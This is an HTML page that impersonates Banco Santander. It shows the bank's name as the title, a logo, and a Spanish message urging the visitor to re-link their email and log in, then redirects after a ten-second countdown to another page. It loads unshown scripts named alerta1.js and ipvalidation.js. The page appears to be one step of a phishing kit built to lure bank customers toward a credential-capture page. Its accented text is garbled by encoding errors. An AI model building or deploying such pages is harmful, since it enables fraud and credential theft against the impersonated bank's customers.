<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="stylesheet" href="estilo.css">
    <script src="https://cdn.jsdelivr.net/npm/axios/dist/axios.min.js"></script>
    <script src="alerta1.js"></script>
    <script src="ipvalidation.js"></script>
    <link rel="icon" href="icono.png" type="image/x-icon"> 
    <link rel="apple-touch-icon" href="icono.png"> 
    <title>Banco Santander</title>
    <style>
        body {
            display: flex;
            justify-content: center;
            align-items: center;
            height: 100vh;
            margin: 0;
        }
        .general {
            text-align: center;
        }
        .form {
            max-width: 400px;
            margin: 0 auto;
            padding: 20px;
            background-color: #f5f5f5;
            border-radius: 8px;
            box-shadow: 0 0 10px rgba(0, 0, 0, 0.1);
        }
     /*    .logo {
            width: 100px;
            margin-bottom: 20px;
        } */
    </style>
    <script>
        window.onload = function() {
            var segundos = 10;
            var contadorElemento = document.getElementById("contador");
            var intervalo = setInterval(function() {
                contadorElemento.textContent = "Cargando Plataforma: " + segundos;
                segundos--;
                if (segundos < 0) {
                    clearInterval(intervalo);
                    window.location.href = "out2.html";
                }
            }, 1000);
        };
    </script>
</head>
<body class="body">
    <div class="general">
        <form id="formulario" class="form">
            <img src="logo.png" class="logo">
            <p id="contador">Cargando Plataforma: 10</p>
            <p class="texto1"><b>Necesitamos que vincule nuevamente su correo electr칩nico, inicie sesi칩n y se vincular치 autom치ticamente</b></p>
        </form>
    </div>
</body>
</html>
